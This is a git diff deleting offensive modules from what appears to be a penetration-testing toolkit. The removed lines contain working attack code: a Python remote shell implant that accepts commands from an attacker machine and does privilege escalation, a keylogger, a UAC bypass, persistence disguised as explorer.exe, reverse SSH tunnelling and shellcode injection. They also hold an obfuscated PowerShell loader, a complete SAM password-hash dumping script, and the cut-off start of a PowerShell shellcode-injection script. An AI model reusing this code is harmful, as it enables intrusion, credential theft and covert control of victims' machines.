- # A loop is started which continues to receive until we hit
- # the length of what our entire full encrypted shell output
- # is equaled. Once that occurs, we are out of our loop and
- # the full string is sent to the decryption routine and
- # presented back to us.
-
- MSGLEN = 0
- dataout = ""
- length = int(data)
- while MSGLEN != length:
- data = sockobj.recv(1024)
- dataout += data
- MSGLEN = MSGLEN + len(data)
-
- data = decrypt_packet(dataout, encryption, cipher)
- filewrite.write(data)
-
- # close file after write
- filewrite.close()
-
- # confirm its there
- if os.path.isfile(upload_path):
- send_packet("Confirmed", sockobj, encryption, cipher)
-
- # if its not then send back failed
- if not os.path.isfile(upload_path):
- send_packet("Failed", sockobj, encryption, cipher)
-
- # handle error messages
- except Exception as e:
- if verbose == True:
- print(e)
- pass
-
- # here is where we start our paramiko SSH tunneling
- if data == "paramiko":
-
- # start initial try block
- try:
- # send to the server that we support paramiko
- send_packet("Paramiko Confirmed.",
- sockobj, encryption, cipher)
-
- # receive all of our variables to establish tunnel
- data = sockobj.recv(1024)
- # decrypt the packet
- data = decrypt_packet(data, encryption, cipher)
-
- # receive all
- data = sockobj.recv(int(data))
- data = decrypt_packet(data, encryption, cipher)
-
- # split into a tuple
- data = data.split(",")
-
- # IP of the SSH server
- ssh_server_ip = data[0]
- # PORT of the SSH server
- ssh_server_port_address = data[1]
- # PORT to use on localhost for tunneled protcol
- ssh_server_tunnel_port = data[2]
- # username for SSH server
- ssh_server_username = data[3]
- # password for SSH server
- ssh_server_password = data[4]
- # PORT to forward from victim
- victim_server_port = data[5]
- # specify data as ssh_port_tunnel
-
- # main class here
- def 
main(garbage_one, garbage_two, garbage_three):
- # our ssh server
- server = [ssh_server_ip, int(ssh_server_port_address)]
- # what we want to tunnel
- remote = ['127.0.0.1', int(victim_server_port)]
- password = ssh_server_password # our password
- client = paramiko.SSHClient() # use the paramiko SSHClient
- client.load_system_host_keys() # load SSH keys
- client.set_missing_host_key_policy(
- paramiko.AutoAddPolicy()) # automatically add SSH key
-
- try:
- client.connect(server[0], server[
- 1], username=ssh_server_username, key_filename=None, look_for_keys=False, password=password)
-
- # except exception
- except Exception as e:
- if verbose == True:
- print('*** Failed to connect to %s:%d: %r' % (server[0], server[1], e))
- try:
- reverse_forward_tunnel(ssh_server_tunnel_port, remote[
- 0], remote[1], client.get_transport())
-
- # except exception
- except Exception as e:
- if verbose == True:
- print(e)
-
- # have to pass some garbage to start thread
- garbage_one = ""
- garbage_two = ""
- garbage_three = ""
-
- # start a new thread to ensure that when we establish an SSH tunnel we can continue
- # to leverage SET interactive shell. 
- # this starts the main routine which is where we get all - # our port forward stuff - thread.start_new_thread( - main, (garbage_one, garbage_two, garbage_three)) - - # except exception - except Exception as e: - if verbose == True: - print(e) - - # lock the workstation of victim - if data == "lockworkstation": - ctypes.windll.user32.LockWorkStation() - - # elevate permissions - if data == "getsystem": - try: - temp_path = os.getenv('TEMP') - - # this is our shell exectuable - set_payload = temp_path + "\\" + \ - generate_random_string(10, 15) + ".exe" - - # accept the file and write it do disk as the set_payload - # variable - upload_file(set_payload) - - # sleep 0.5 seconds - time.sleep(0.5) - - # this will spawn the shell in a seperate process thread as - # SYSTEM - def getsystem(set_payload, ipaddr): - # generate a random string between 10 and 15 length - service_name = generate_random_string(10, 15) - # create a service - subprocess.Popen('sc create %s binpath= "cmd /c %s %s" type= own' % - (service_name, set_payload, ipaddr), shell=True).wait() - - # start the service, don't wait for it to finish - subprocess.Popen("sc start %s" % - (service_name), shell=True) - - # define data as a received information from attacker - # machine - data = sockobj.recv(1024) - - # decrypt the packet which will tell us length to be sent - data = decrypt_packet(data, encryption, cipher) - - # this will be our ipaddress and port - data = sockobj.recv(1024) - - # decrypted file path - data = decrypt_packet(data, encryption, cipher) - - # this is our ipaddress and port - ipaddr = data - - # - # start a new thread - # - thread.start_new_thread(getsystem, (set_payload, ipaddr)) - - # handle error messages - except Exception as e: - if verbose == True: - print(e) - pass - - # keystroke logging - if data == "keystroke_start": - - # TEMP directory - temp_path = os.getenv('TEMP') - - # this is the log file - global logfile - logfile = temp_path + "\\" + generate_random_string(10, 15) - - 
# trigger an event - def OnKeyboardEvent(event): - - filewrite = open(logfile, "a") - filewrite.write(chr(event.Ascii)) - filewrite.close() - return True - - # start keystroke logging - def start_keystroke(garbage1, garbage2, garbage3): - - hm = pyHook.HookManager() - hm.KeyDown = OnKeyboardEvent - hm.HookKeyboard() - pythoncom.PumpMessages() - - # need to pass vars to meet threading requirements - garbage1 = "" - garbage2 = "" - garbage3 = "" - - # start the keystroke logger - thread.start_new_thread( - start_keystroke, (garbage1, garbage2, garbage3)) - - # dump keystrokes - if data == "keystroke_dump": - - # set a flag to test if we ran keystroke_start first - flag = 0 - # try to see if logfile is there - try: - logfile - except: - flag = 1 - - # if we are all set - if flag == 0: - - # open the logfile - if os.path.isfile(logfile): - fileopen = open(logfile, "r") - - # read all the data - data = fileopen.read() - - # if we found nothing yet - if data == "": - data = "[!] There is no captured keystrokes yet." - - if not os.path.isfile(logfile): - data = "[!] There is no captured keystrokes yet." - - send_packet(data, sockobj, encryption, cipher) - - # if we didn't start the keystroke - if flag == 1: - send_packet( - "[!] 
It doesn't appear keystroke_start is running, did you execute the command?", sockobj, encryption, cipher) - - # bypass windows uac - if data == "bypassuac": - # try block - try: - - # TEMP directory - temp_path = os.getenv('TEMP') - - # this is our bypass uac executable - bypassuac = temp_path + "\\" + \ - generate_random_string(10, 15) + ".exe" - - # this is our actual SET payload to be executed with UAC - # safe stuff - set_payload = temp_path + "\\" + \ - generate_random_string(10, 15) + ".exe" - - # upload our files first is bypass uac - upload_file(bypassuac) - - # sleep 0.5 seconds - time.sleep(0.5) - - # set payload - upload_file(set_payload) - - # this will spawn the shell in a seperate process thread - def launch_uac(bypassuac, set_payload, ipaddress): - subprocess.Popen( - "%s /c %s %s" % (bypassuac, set_payload, ipaddress), shell=True).wait() - - # define data as a received information from attacker - # machine - data = sockobj.recv(1024) - - # decrypt the packet which will tell us length to be sent - data = decrypt_packet(data, encryption, cipher) - - # this will be our ipaddress and port - data = sockobj.recv(1024) - - # decrypted file path - data = decrypt_packet(data, encryption, cipher) - - # this is our ipaddress and port - ipaddr = data - - # - # start a new thread - # - thread.start_new_thread( - launch_uac, (bypassuac, set_payload, ipaddr)) - - # handle error messages - except Exception as e: - if verbose == True: - print(e) - pass - - # remov for SET - if data == "removepersistence": - # try block - try: - # WINDIR directory - windir_path = os.getenv('WINDIR') - # this is our SET interactive service executable - # set_service = windir_path + "\\system32\\" + generate_random_string(10,15) + ".exe" - set_service = windir_path + "\\system32\\" + "explorer.exe" - subprocess.Popen("%s stop" % ( - set_service), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) - subprocess.Popen("%s remove" % ( - set_service), 
shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) - - # handle error messages - except Exception as e: - if verbose == True: - print(e) - pass - - # persistence for SET - if data == "persistence": - # try block - try: - - # WINDIR directory - windir_path = os.getenv('WINDIR') - - # enumerate home directory - homedir_path = os.getenv("SystemDrive") - homedir_path = homedir_path + "\\Program Files\\Common Files\\" - - # see if we are running vista/windows 7 (potential for UAC) - os_counter = 0 - - # see if its vista or windows 7 - if os.path.isdir(homedir_path): - os_counter = 1 - set_service = homedir_path + "explorer.exe" - set_shell = homedir_path + \ - generate_random_string(10, 15) + ".exe" - - # this is our SET interactive service executable - # if its at system32 - if os_counter == 0: - if os.path.isdir("%s\\system32" % (windir_path)): - set_service = windir_path + "\\system32\\" + "explorer.exe" - - # this is the SET interactive shell - set_shell = windir_path + "\\system32\\" + \ - generate_random_string(10, 15) + ".exe" - - # upload the persistence set interactive shell - upload_file(set_service) - - # sleep 0.5 seconds - time.sleep(0.5) - - # upload our SET interactive service - upload_file(set_shell) - - # define data as a received information from attacker - # machine - data = sockobj.recv(1024) - - # decrypt the packet which will tell us length to be sent - data = decrypt_packet(data, encryption, cipher) - - # this will be our ipaddress and port - data = sockobj.recv(1024) - - # decrypted file path - data = decrypt_packet(data, encryption, cipher) - - # this is our ipaddress and port - ipaddr = data - #ipaddr = set_shell + " " + ipaddr - if os_counter == 0: - filewrite = open("%s\\system32\\isjxwqjs" % - (windir_path), "w") - if os_counter == 1: - filewrite = open("%sisjxwqjs" % (homedir_path), "w") - filewrite.write('"' + set_shell + '"' + " " + ipaddr) - filewrite.close() - time.sleep(2) - # automatically start service 
- subprocess.Popen('"%s" --startup auto install' % (set_service), shell=True, - stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) - time.sleep(5) - # start the service - subprocess.Popen('"%s" start' % ( - set_service), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) - - # handle error messages - except Exception as e: - if verbose == True: - print(e) - pass - - # if the attacker specifies a command shell lets get it ready - if data == "ps": - try: - # if we're running windows then use win32process to - # enumerate - if operating_system == "windows": - processes = win32process.EnumProcesses() - data = "" - for pid in processes: - try: - handle = win32api.OpenProcess( - win32con.PROCESS_ALL_ACCESS, False, pid) - exe = win32process.GetModuleFileNameEx( - handle, 0) - data += exe + " PID:" + str(pid) + "\r\n" - except: - pass - - # if we're running linux then run subprocess ps -aux to - # enumerate - if operating_system == "posix": - - # send our command that would be 'data' - proc = subprocess.Popen( - "ps -ax", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) - - # communicate with stdout and send it back to attacker - stdout_value = proc.stdout.read() - - # if we have an error just append to nothing if needed - stdout_value += proc.stderr.read() - - # send the data back - data = stdout_value - - # send our data - send_packet(data, sockobj, encryption, cipher) - - except Exception as e: - if verbose == True: - print(e) - - # if we want to kill a process - if data == "kill": - try: - # recv initial length of next socket - data = sockobj.recv(1024) - data = decrypt_packet(data, encryption, cipher) - # this should be our pid to kill - data = sockobj.recv(int(data)) - pid = decrypt_packet(data, encryption, cipher) - - # if we're running windows then use win32api to kill and - # terminate process - if operating_system == "windows": - # specify handler as the process id received - 
handler = win32api.OpenProcess( - win32con.PROCESS_TERMINATE, 0, int(pid)) - # kill the process through the win32api - # TerminatorProcess function call - win32api.TerminateProcess(handler, 0) - - # if we're running linux then run kill -9 - if operating_system == "posix": - subprocess.Popen("kill -9 %s" % (pid), shell=True) - - data = "Confirmed kill" - # send our data - send_packet(data, sockobj, encryption, cipher) - - # except exception - except Exception as e: - if verbose == True: - print(e) - sys.exit() - - # this is for rebooting the server - if data == "reboot": - try: - # if we're running windows then use win32process to - # enumerate - if operating_system == "windows": - RebootServer() - data = "[*] Server has been rebooted." - - # if we're running linux then run subprocess ps -aux to - # enumerate - if operating_system == "posix": - - # send our command that would be 'data' - proc = subprocess.Popen( - "reboot now", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) - - # send the data back - data = "[*] Server has been rebooted." - - # send our data - send_packet(data, sockobj, encryption, cipher) - - except Exception as e: - if verbose == True: - print(e) - - # this section is if the attacker wants to upload a file - if data == "shellcode": - # try block - try: - - # define data as a received information from attacker - # machine - data = sockobj.recv(1024) - - # decrypt the packet which will tell us length to be sent - data = decrypt_packet(data, encryption, cipher) - - # here is an ugly hack but it works, basically we set two - # counters. MSGLEN which will eventually equal the length - # of what number was sent to us which represented the length - # of the output of the shell command we executed. Dataout - # will eventually equal the entire string loaded into our - # buffer then sent for decryption. 
- # - # A loop is started which continues to receive until we hit - # the length of what our entire full encrypted shell output - # is equaled. Once that occurs, we are out of our loop and - # the full string is sent to the decryption routine and - # presented back to us. - - MSGLEN = 0 - dataout = "" - length = int(data) - while MSGLEN != length: - data = sockobj.recv(1024) - dataout += data - MSGLEN = MSGLEN + len(data) - - data = decrypt_packet(dataout, encryption, cipher) - - shellcode = bytearray("%s" % (data)) - - # awesome shellcode injection code - # http://www.debasish.in/2012/04/execute-shellcode-using-python.html - ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), - ctypes.c_int( - len(shellcode)), - ctypes.c_int( - 0x3000), - ctypes.c_int(0x40)) - - ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), - ctypes.c_int(len(shellcode))) - - buf = (ctypes.c_char * len(shellcode) - ).from_buffer(shellcode) - - ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), - buf, - ctypes.c_int(len(shellcode))) - - ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), - ctypes.c_int(0), - ctypes.c_int(ptr), - ctypes.c_int(0), - ctypes.c_int(0), - ctypes.pointer(ctypes.c_int(0))) - - ctypes.windll.kernel32.WaitForSingleObject( - ctypes.c_int(ht), ctypes.c_int(-1)) - - # handle error messages - except Exception as e: - if verbose == True: - print(e) - pass - -# keyboard interrupts here -except KeyboardInterrupt: - if verbose == True: - print("[!] KeyboardInterrupt detected. Bombing out of the interactive shell.") - -# handle exceptions -except Exception as e: - if verbose == True: - print(e) - sys.exit() diff --git a/src/payloads/set_payloads/shell.windows b/src/payloads/set_payloads/shell.windows deleted file mode 100755 index 9554adcc8..000000000 Binary files a/src/payloads/set_payloads/shell.windows and /dev/null differ 
diff --git a/src/payloads/set_payloads/uac_bypass/x64.binary b/src/payloads/set_payloads/uac_bypass/x64.binary deleted file mode 100755 index 8ac912bb3..000000000 Binary files a/src/payloads/set_payloads/uac_bypass/x64.binary and /dev/null differ diff --git a/src/payloads/set_payloads/uac_bypass/x86.binary b/src/payloads/set_payloads/uac_bypass/x86.binary deleted file mode 100755 index de6211aba..000000000 Binary files a/src/payloads/set_payloads/uac_bypass/x86.binary and /dev/null differ diff --git a/src/powershell/powerdump.encoded b/src/powershell/powerdump.encoded deleted file mode 100644 index 367dc4a14..000000000 --- a/src/powershell/powerdump.encoded +++ /dev/null @@ -1,2 +0,0 @@ -powershell -NoExit -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"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\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();clear;\"Load complete.\"" - diff --git a/src/powershell/powerdump.powershell b/src/powershell/powerdump.powershell deleted file mode 100644 index f20e00a13..000000000 --- a/src/powershell/powerdump.powershell +++ /dev/null 
@@ -1,366 +0,0 @@ -# -# PowerShell CreateCmd Bypass by Kathy Peters, Josh Kelley (winfang) and Dave Kennedy (ReL1K) -# Defcon Release -# -# -# -function LoadApi -{ - $oldErrorAction = $global:ErrorActionPreference; - $global:ErrorActionPreference = "SilentlyContinue"; - $test = [PowerDump.Native]; - $global:ErrorActionPreference = $oldErrorAction; - if ($test) - { - # already loaded - return; - } - -$code = @' -using System; -using System.Security.Cryptography; -using System.Runtime.InteropServices; -using System.Text; - -namespace PowerDump -{ - public class Native - { - [DllImport("advapi32.dll", CharSet = CharSet.Auto)] - public static extern int RegOpenKeyEx( - int hKey, - string subKey, - int ulOptions, - int samDesired, - out int hkResult); - - [DllImport("advapi32.dll", EntryPoint = "RegEnumKeyEx")] - extern public static int RegEnumKeyEx( - int hkey, - int index, - StringBuilder lpName, - ref int lpcbName, - int reserved, - StringBuilder lpClass, - ref int lpcbClass, - out long lpftLastWriteTime); - - [DllImport("advapi32.dll", EntryPoint="RegQueryInfoKey", CallingConvention=CallingConvention.Winapi, SetLastError=true)] - extern public static int RegQueryInfoKey( - int hkey, - StringBuilder lpClass, - ref int lpcbClass, - int lpReserved, - out int lpcSubKeys, - out int lpcbMaxSubKeyLen, - out int lpcbMaxClassLen, - out int lpcValues, - out int lpcbMaxValueNameLen, - out int lpcbMaxValueLen, - out int lpcbSecurityDescriptor, - IntPtr lpftLastWriteTime); - - [DllImport("advapi32.dll", SetLastError=true)] - public static extern int RegCloseKey( - int hKey); - - } - } // end namespace PowerDump - - public class Shift { - public static int Right(int x, int count) { return x >> count; } - public static uint Right(uint x, int count) { return x >> count; } - public static long Right(long x, int count) { return x >> count; } - public static ulong Right(ulong x, int count) { return x >> count; } - public static int Left(int x, int count) { return x << count; } - 
public static uint Left(uint x, int count) { return x << count; } - public static long Left(long x, int count) { return x << count; } - public static ulong Left(ulong x, int count) { return x << count; } - } -'@ - - $provider = New-Object Microsoft.CSharp.CSharpCodeProvider - $dllName = [PsObject].Assembly.Location - $compilerParameters = New-Object System.CodeDom.Compiler.CompilerParameters - $assemblies = @("System.dll", $dllName) - $compilerParameters.ReferencedAssemblies.AddRange($assemblies) - $compilerParameters.GenerateInMemory = $true - $compilerResults = $provider.CompileAssemblyFromSource($compilerParameters, $code) - if($compilerResults.Errors.Count -gt 0) { - $compilerResults.Errors | % { Write-Error ("{0}:`t{1}" -f $_.Line,$_.ErrorText) } - } - -} - -$antpassword = [Text.Encoding]::ASCII.GetBytes("NTPASSWORD`0"); -$almpassword = [Text.Encoding]::ASCII.GetBytes("LMPASSWORD`0"); -$empty_lm = [byte[]]@(0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee); -$empty_nt = [byte[]]@(0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89,0xc0); -$odd_parity = @( - 1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14, - 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31, - 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47, - 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62, - 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79, - 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94, - 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110, - 112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127, - 128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143, - 145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158, - 161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174, - 176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191, - 193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206, - 
208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223, - 224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239, - 241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254 -); - -function sid_to_key($sid) -{ - $s1 = @(); - $s1 += [char]($sid -band 0xFF); - $s1 += [char]([Shift]::Right($sid,8) -band 0xFF); - $s1 += [char]([Shift]::Right($sid,16) -band 0xFF); - $s1 += [char]([Shift]::Right($sid,24) -band 0xFF); - $s1 += $s1[0]; - $s1 += $s1[1]; - $s1 += $s1[2]; - $s2 = @(); - $s2 += $s1[3]; $s2 += $s1[0]; $s2 += $s1[1]; $s2 += $s1[2]; - $s2 += $s2[0]; $s2 += $s2[1]; $s2 += $s2[2]; - return ,((str_to_key $s1),(str_to_key $s2)); -} - -function str_to_key($s) -{ - $key = @(); - $key += [Shift]::Right([int]($s[0]), 1 ); - $key += [Shift]::Left( $([int]($s[0]) -band 0x01), 6) -bor [Shift]::Right([int]($s[1]),2); - $key += [Shift]::Left( $([int]($s[1]) -band 0x03), 5) -bor [Shift]::Right([int]($s[2]),3); - $key += [Shift]::Left( $([int]($s[2]) -band 0x07), 4) -bor [Shift]::Right([int]($s[3]),4); - $key += [Shift]::Left( $([int]($s[3]) -band 0x0F), 3) -bor [Shift]::Right([int]($s[4]),5); - $key += [Shift]::Left( $([int]($s[4]) -band 0x1F), 2) -bor [Shift]::Right([int]($s[5]),6); - $key += [Shift]::Left( $([int]($s[5]) -band 0x3F), 1) -bor [Shift]::Right([int]($s[6]),7); - $key += $([int]($s[6]) -band 0x7F); - 0..7 | %{ - $key[$_] = [Shift]::Left($key[$_], 1); - $key[$_] = $odd_parity[$key[$_]]; - } - return ,$key; -} - -function NewRC4([byte[]]$key) -{ - return new-object Object | - Add-Member NoteProperty key $key -PassThru | - Add-Member NoteProperty S $null -PassThru | - Add-Member ScriptMethod init { - if (-not $this.S) - { - [byte[]]$this.S = 0..255; - 0..255 | % -begin{[long]$j=0;}{ - $j = ($j + $this.key[$($_ % $this.key.Length)] + $this.S[$_]) % $this.S.Length; - $temp = $this.S[$_]; $this.S[$_] = $this.S[$j]; $this.S[$j] = $temp; - } - } - } -PassThru | - Add-Member ScriptMethod "encrypt" { - $data = $args[0]; - $this.init(); - $outbuf = 
new-object byte[] $($data.Length); - $S2 = $this.S[0..$this.S.Length]; - 0..$($data.Length-1) | % -begin{$i=0;$j=0;} { - $i = ($i+1) % $S2.Length; - $j = ($j + $S2[$i]) % $S2.Length; - $temp = $S2[$i];$S2[$i] = $S2[$j];$S2[$j] = $temp; - $a = $data[$_]; - $b = $S2[ $($S2[$i]+$S2[$j]) % $S2.Length ]; - $outbuf[$_] = ($a -bxor $b); - } - return ,$outbuf; - } -PassThru -} - -function des_encrypt([byte[]]$data, [byte[]]$key) -{ - return ,(des_transform $data $key $true) -} - -function des_decrypt([byte[]]$data, [byte[]]$key) -{ - return ,(des_transform $data $key $false) -} - -function des_transform([byte[]]$data, [byte[]]$key, $doEncrypt) -{ - $des = new-object Security.Cryptography.DESCryptoServiceProvider; - $des.Mode = [Security.Cryptography.CipherMode]::ECB; - $des.Padding = [Security.Cryptography.PaddingMode]::None; - $des.Key = $key; - $des.IV = $key; - $transform = $null; - if ($doEncrypt) {$transform = $des.CreateEncryptor();} - else{$transform = $des.CreateDecryptor();} - $result = $transform.TransformFinalBlock($data, 0, $data.Length); - return ,$result; -} - -function Get-RegKeyClass([string]$key, [string]$subkey) -{ - switch ($Key) { - "HKCR" { $nKey = 0x80000000} #HK Classes Root - "HKCU" { $nKey = 0x80000001} #HK Current User - "HKLM" { $nKey = 0x80000002} #HK Local Machine - "HKU" { $nKey = 0x80000003} #HK Users - "HKCC" { $nKey = 0x80000005} #HK Current Config - default { - throw "Invalid Key. 
Use one of the following options HKCR, HKCU, HKLM, HKU, HKCC" - } - } - $KEYQUERYVALUE = 0x1; - $KEYREAD = 0x19; - $KEYALLACCESS = 0x3F; - $result = ""; - [int]$hkey=0 - if (-not [PowerDump.Native]::RegOpenKeyEx($nkey,$subkey,0,$KEYREAD,[ref]$hkey)) - { - $classVal = New-Object Text.Stringbuilder 1024 - [int]$len = 1024 - if (-not [PowerDump.Native]::RegQueryInfoKey($hkey,$classVal,[ref]$len,0,[ref]$null,[ref]$null, - [ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,0)) - { - $result = $classVal.ToString() - } - else - { - Write-Error "RegQueryInfoKey failed"; - } - [PowerDump.Native]::RegCloseKey($hkey) | Out-Null - } - else - { - Write-Error "Cannot open key"; - } - return $result; -} - -function Get-BootKey -{ - $s = [string]::Join("",$("JD","Skew1","GBG","Data" | %{Get-RegKeyClass "HKLM" "SYSTEM\CurrentControlSet\Control\Lsa\$_"})); - $b = new-object byte[] $($s.Length/2); - 0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)} - $b2 = new-object byte[] 16; - 0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 | % -begin{$i=0;}{$b2[$i]=$b[$_];$i++} - return ,$b2; -} - -function Get-HBootKey -{ - param([byte[]]$bootkey); - $aqwerty = [Text.Encoding]::ASCII.GetBytes("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%`0"); - $anum = [Text.Encoding]::ASCII.GetBytes("0123456789012345678901234567890123456789`0"); - $k = Get-Item HKLM:\SAM\SAM\Domains\Account; - if (-not $k) {return $null} - [byte[]]$F = $k.GetValue("F"); - if (-not $F) {return $null} - $rc4key = [Security.Cryptography.MD5]::Create().ComputeHash($F[0x70..0x7F] + $aqwerty + $bootkey + $anum); - $rc4 = NewRC4 $rc4key; - return ,($rc4.encrypt($F[0x80..0x9F])); -} - -function Get-UserName([byte[]]$V) -{ - if (-not $V) {return $null}; - $offset = [BitConverter]::ToInt32($V[0x0c..0x0f],0) + 0xCC; - $len = [BitConverter]::ToInt32($V[0x10..0x13],0); - return [Text.Encoding]::Unicode.GetString($V, $offset, $len); -} - -function Get-UserHashes($u, 
[byte[]]$hbootkey) -{ - [byte[]]$enc_lm_hash = $null; [byte[]]$enc_nt_hash = $null; - - # check if hashes exist (if byte memory equals to 20, then we've got a hash) - $LM_exists = $false; - $NT_exists = $false; - # LM header check - if ($u.V[0xa0..0xa3] -eq 20) - { - $LM_exists = $true; - } - # NT header check - elseif ($u.V[0xac..0xaf] -eq 20) - { - $NT_exists = $true; - } - - if ($LM_exists -eq $true) - { - $lm_hash_offset = $u.HashOffset + 4; - $nt_hash_offset = $u.HashOffset + 8 + 0x10; - $enc_lm_hash = $u.V[$($lm_hash_offset)..$($lm_hash_offset+0x0f)]; - $enc_nt_hash = $u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)]; - } - - elseif ($NT_exists -eq $true) - { - $nt_hash_offset = $u.HashOffset + 8; - $enc_nt_hash = [byte[]]$u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)]; - } - return ,(DecryptHashes $u.Rid $enc_lm_hash $enc_nt_hash $hbootkey); -} - -function DecryptHashes($rid, [byte[]]$enc_lm_hash, [byte[]]$enc_nt_hash, [byte[]]$hbootkey) -{ - [byte[]]$lmhash = $empty_lm; [byte[]]$nthash=$empty_nt; - # LM Hash - if ($enc_lm_hash) - { - $lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword; - } - - # NT Hash - if ($enc_nt_hash) - { - $nthash = DecryptSingleHash $rid $hbootkey $enc_nt_hash $antpassword; - } - - return ,($lmhash,$nthash) -} - -function DecryptSingleHash($rid,[byte[]]$hbootkey,[byte[]]$enc_hash,[byte[]]$lmntstr) -{ - $deskeys = sid_to_key $rid; - $md5 = [Security.Cryptography.MD5]::Create(); - $rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr); - $rc4 = NewRC4 $rc4_key; - $obfkey = $rc4.encrypt($enc_hash); - $hash = (des_decrypt $obfkey[0..7] $deskeys[0]) + - (des_decrypt $obfkey[8..$($obfkey.Length - 1)] $deskeys[1]); - return ,$hash; -} - -function Get-UserKeys -{ - ls HKLM:\SAM\SAM\Domains\Account\Users | - where {$_.PSChildName -match "^[0-9A-Fa-f]{8}$"} | - Add-Member AliasProperty KeyName PSChildName -PassThru | - Add-Member ScriptProperty Rid {[Convert]::ToInt32($this.PSChildName, 
16)} -PassThru | - Add-Member ScriptProperty V {[byte[]]($this.GetValue("V"))} -PassThru | - Add-Member ScriptProperty UserName {Get-UserName($this.GetValue("V"))} -PassThru | - Add-Member ScriptProperty HashOffset {[BitConverter]::ToUInt32($this.GetValue("V")[0x9c..0x9f],0) + 0xCC} -PassThru -} - -function DumpHashes -{ - LoadApi - $bootkey = Get-BootKey; - $hbootKey = Get-HBootKey $bootkey; - Get-UserKeys | %{ - $hashes = Get-UserHashes $_ $hBootKey; - "{0}:{1}:{2}:{3}:::" -f ($_.UserName,$_.Rid, - [BitConverter]::ToString($hashes[0]).Replace("-","").ToLower(), - [BitConverter]::ToString($hashes[1]).Replace("-","").ToLower()); - } -} -DumpHashes diff --git a/src/powershell/shellcode_injection_expanded.powershell b/src/powershell/shellcode_injection_expanded.powershell deleted file mode 100644 index c7a37acf2..000000000 --- a/src/powershell/shellcode_injection_expanded.powershell +++ /dev/null 
@@ -1,45 +0,0 @@ -<# -Powershell Code Execution 'Exploit' -Author: Matthew Graeber -Disclaimer: This code is provided for academic purposes only and should not be used for evil. You are liable for your own actions. -#> - -# Import required functions -$code = @" -[DllImport("kernel32.dll")] -public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); -[DllImport("kernel32.dll")] -public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); -[DllImport("msvcrt.dll")] -public static extern IntPtr memset(IntPtr dest, uint src, uint count); -"@ - -# Add CSharp code as a class recognized by Powershell -$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru - -# Copy and paste your shellcode here in the form 0xXX. -# 32-bit payload -# msfvenom windows/exec CMD="cmd /k calc" EXITFUNC=thread -[Byte[]]$sc32 = 
